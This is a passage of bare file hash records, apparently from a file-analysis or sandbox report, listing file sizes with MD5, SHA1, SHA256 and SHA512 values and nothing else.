  SHA256 7744c9c84c28033bc3606f4dfce2adcd6f632e2be7827893c3e2257100f1cf9e
  SHA512 30b3a001550dca88c8effc9e8107442560ee1f42e3d2f354cc2813ae9030bf872c76dc211fd12778385387be5937e9bf172ea00c151cab0bca77c8aafdd11f7d
- Filesize 172KB
  MD5    c0a69f1b0c50d4f133cd0b278ac2a531
  SHA1   bcefbe60c18318f21ba53377a386733e9266c37d
  SHA256 a4f79c99d8923bd6c30efafa39363c18babe95f6609bbad242bca44342ccc7bb
  SHA512 c38b0b08e7d37f31ab4331fcc54033ec181dc399e39df602869846f53e3dc006425a81b7b08f352c5e54501e247657364dfc288085a7c1c552737d4db4f33406
- Filesize 683KB
  MD5    6815034209687816d8cf401877ec8133
  SHA1   1248142eb45eed3beb0d9a2d3b8bed5fe2569b10
  SHA256 7f912b28a07c226e0be3acfb2f57f050538aba0100fa1f0bf2c39f1a1f1da814
  SHA512 3398094ce429ab5dcdecf2ad04803230669bb4accaef7083992e9b87afac55841ba8def2a5168358bd17e60799e55d076b0e5ca44c86b9e6c91150d3dc37c721
- Filesize 29KB
  MD5    bee2969583715bfa584d073ac8d98c42
  SHA1   37d1221ce6bb82e7ad08fd22bd13592815a23468
  SHA256 5f92db78e43986f063632fb2cfafdce73e5e7e64979900783ca9a00016933375
  SHA512 5c139b81a51477d8362be2bf72b9f2425d54ef67b4ad715fbe8aa11f8a57435abb7f23a7ecaee18611e559d1006c0df5dd3427b6e7c3caed38d8cffd79e4bb1c
- Filesize 2.7MB
  MD5    1d4e91345a76c90e0849c9389e66fe8c
  SHA1   744393f64d9f95a987605ac14b721dbbc985901c
  SHA256 1d820d1c1e9d661603cd32177fb128c9a6844fe2492b6fbb3120bd37553663b0
  SHA512 e0c5fa5c9141e139d529b80058c1ff8fb252116076c57fbea106ee2500cb23d3a91b76f6348bc0bcf465acde510463352a960eefd29198f4068661342cbd28b8
- Filesize 33KB
  MD5    2d6ac27235e545727f1c543cbcb4c606
  SHA1   6163fc890a58102a47a8c799adb2e8ed0fa4536e
  SHA256 615aa9b90fb40c052eea89f0b273ed0bc5a4ab218783d30f00ecd72d56b08a25
  SHA512 7336c57706f071b5a806baae01fe049976081e1f7643c4f61193f37d62192bd950e1712e9ee864e3bed9246361d46f9581b6314771242299c102e2e43ad2049a
- Filesize 33KB
  MD5    418dc008ef956465e179ec29d3c3c245
  SHA1   4960b2952c6cc8de2295f145c3a4526bf6d1a391
  SHA256 8c7e21b37540211d56c5fdbb7e731655a96945aa83f2988e33d5adb8aa7c8df1
  SHA512 ad386b6cf99682d117dce3a38c37f45843ac87d9ad17608453c0dfe8dd2b74c0c19c46a35da8140dc3ffc61d2333d78ab1438723cfd74aac585c39f0f59542f2
- Filesize 1KB
  MD5    7e0b0f449c419bc5dce0a9ae1920c00c
  SHA1   f36d4c8d25b082811e54e4c07f66b09dffc7c981
  SHA256 2ca989920e2cd5c250be6fb5e0ef82ee45a77f2147e91d736562c110b5ec372e
  SHA512 af229aa9d53c197e66aea3a66d1bf210f4fe0a9bdf0c8e17e4c2b8e1951a68ee55dd859313f6872ba10b289752f390901b9301525bd0ff93079f5b0ce4cbaeb1
- Filesize 274KB
  MD5    d16fffeb71891071c1c5d9096ba03971
  SHA1   24c2c7a0d6c9918f037393c2a17e28a49d340df1
  SHA256 141b235af8ebf25d5841edee29e2dcf6297b8292a869b3966c282da960cbd14d
  SHA512 27fb5b77fcadbe7bd1af51f7f40d333cd12de65de12e67aaea4e5f6c0ac2a62ee65bdafb1dbc4e3c0a0b9a667b056c4c7d984b4eb1bf4b60d088848b2818d87a
- Filesize 229KB
  MD5    d90f058e42618ed7cfecd1b0f2c7a2f7
  SHA1   6bc8f8b727164efd24972fabf82a0d74021d5e31
  SHA256 6ac42ca465daa12786270a6a6378413e8b85829ab024757d2f7e65edea9e5090
  SHA512 9166280987fd9e506fccd9a66e8731740cf5f993e8b3abff078a95f7c7f88b242640ea224762cd02f9237ded38ff5816c53331417b0e411c4a05c8c548059021
- Filesize 8.2MB
  MD5    93303a9651264375b138eda4afa94374
  SHA1   e7eba98dd3a4f6062aaa4d8af45a09b3cc6bbc78
  SHA256 0b905118e9d4781720588e5519d5076b7fb023044b8f6bd4f51a1735e2788b61
  SHA512 81a3169a8b47adf47414d5e5b4f7627a7be99bcaece3c6db5f391ae7b81b513667df898d7e073cc2ba7e5af128b8f799cc5c2327a0f87e9f51cf3c8eed24892b